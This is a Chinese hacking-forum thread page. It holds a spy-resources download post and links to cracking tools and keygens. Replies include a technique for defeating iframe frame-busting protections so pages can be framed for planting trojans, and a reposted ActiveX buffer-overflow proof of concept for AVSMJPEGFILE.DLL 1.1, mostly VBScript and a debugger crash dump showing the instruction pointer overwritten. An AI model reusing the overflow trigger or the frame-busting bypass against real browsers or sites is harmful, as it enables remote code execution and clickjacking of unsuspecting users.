最近看过此主题的会员

返回列表 发帖

特工间谍必备学习资源

觉得蛮不错的,转来这里跟大家分享下!

下载 (131.81 KB)
2011-2-15 13:21


下载地址:
特工间谍



 

您可能还想看的主题:

新手报道

phpcms v9.0 的利用

渗透测试技术的应用---我的一次作业,大牛海涵

牛中牛网页自动点击器V2.5——ADSL换IP终极版+注册机

百分百QQ群发软件V4.5+注册机

SQL 注入手册[INSAFE]

黑客X档案2011年第5月刊

(转)openSUSE 11.4 RC2 发布及下载地址

MS11-011 - Windows 内核权限提升漏洞

中国知音3389密码批量破解工具 [2011年正式发布中文版 Bete1]

非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
2、本话题由:pow78781发表,本帖发表者pow78781符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
3、其他单位或个人使用、转载或引用本帖时必须征得发表者pow78781和本站的同意;
4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
6、本站管理员和版主有权不事先通知发帖者而删除本文。

iframe的挂马与防马
网上通用的防插那版是(子): if(top.location != self.location){ top.location = self.location; } 强插方案为(父): var location=""; 其中这个location是对被赋值的top.location方法的覆盖,导致方法失效。 昨天又遇到另外一个版本(子): if(window!=parent){ parent.navigate(location); } 强插方案为(父): var navigate=""; 即是对parent.navigate方法的覆盖,导致再次引用失效。 那么两个和在一起的强插方案是,在iframe之前加入: <script>var location="";var navigate="";</script> 介绍了“市面上”能见到的两种防御被iframe的方法,以及相应的变态突破方法。 貌似把“受害人”逼上绝路了,我们再来看看这两个方法: 它们都能够判断出自己已经被XX了,可是它们是怎么做的呢? 方法一说:先生,请您出去。 方法二说:同志,请您出去! 然而这先生也说了句:“我就不出去!” 因为“受害人”和这位先生又不是一家子,似乎通过命令对方还无可奈何 —— 同源策略! 但事实上,“请您出去”这种方式显然是针对君子不对小人的,所以Monyer教你一种好方法——“乱棍打出去!” <script> window.onload = function(){ if(top!=self){ var f = document.createElement("form"); f.action=location; f.target="_parent"; document.body.appendChild(f); f.submit(); } }; </script> 目前我个人还没有找到突破的方法,所以至少比以上两种方法更暴力一些!


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

在线媒体技术AVSMJPEGFILE.DLL 1.1缓存溢出
Online Media Technologies AVSMJPEGFILE.DLL 1.1缓存溢出
<pre><code><span style="font: 10pt Courier New;"><span class="general1-symbol"><body bgcolor="#E0E0E0">-------------------------------------------------------------------------------<b>Online Media Technologies AVSMJPEGFILE.DLL 1.1 Remote Buffer Overflow</b>url: www.avsmedia.comAuthor: shinnaimail: shinnai[at]autistici[dot]orgsite: http://shinnai.altervista.org<b><font color=’red’>This was written for educational purpose. Use it at your own risk.Author will be not responsible for any damage.</font></b><b>Technical details:File: AVSMJPEGFILE.DLLVer.: 1.1.1.102</b>Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7<b>Remote execution depends on Internet Explorer settings</b>faultmon dump:09:58:13.236  pid=13E4 tid=145C  EXCEPTION (first-chance)              ----------------------------------------------------------------              Exception C0000005 (ACCESS_VIOLATION writing [41414141])              ----------------------------------------------------------------              EAX=02A31C64: 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00              EBX=00001C4A: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??              ECX=41414141: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??              EDX=00001448: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??              ESP=0188C9A4: A0 3F 9B 02 41 41 41 41-41 41 41 41 41 41 41 41              EBP=0188EE08: 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41              ESI=00000A25: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??              EDI=029B3FA0: 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00              EIP=02BF3604: 89 01 E8 0F D6 03 00 83-C4 04 33 C0 8D A5 EC F7                            --> MOV [ECX],EAX              ----------------------------------------------------------------09:58:13.252  pid=13E4 tid=145C  EXCEPTION (first-chance)              ----------------------------------------------------------------              Exception C0000005 (ACCESS_VIOLATION reading [41414141])              ----------------------------------------------------------------              EAX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??              EBX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??              ECX=41414141: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??              EDX=7C9137D8: 8B 4C 24 04 F7 41 04 06-00 00 00 B8 01 00 00 00              ESP=0188C5D4: BF 37 91 7C BC C6 88 01-80 F2 88 01 D8 C6 88 01              EBP=0188C5F4: A4 C6 88 01 8B 37 91 7C-BC C6 88 01 80 F2 88 01              ESI=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??              EDI=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??              EIP=41414141: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??                            --> N/A              -----------------------------------------------------------------------------------------------------------------------------------------------<object classid=’clsid:4CF945DB-7D52-437B-AD30-185336B44C74’ id=’test’></object><input language=VBScript onclick=tryMe() type=button value=’Click here to start the test’><script language=’vbscript’>Sub tryMe  buff = String(3620, "A")  test.CreateStill buff, 1, TrueEnd Sub</script></span></span></code></pre>med.rar


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

这个贴不错!!!!!看了之后就要回复贴子,呵呵


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

返回列表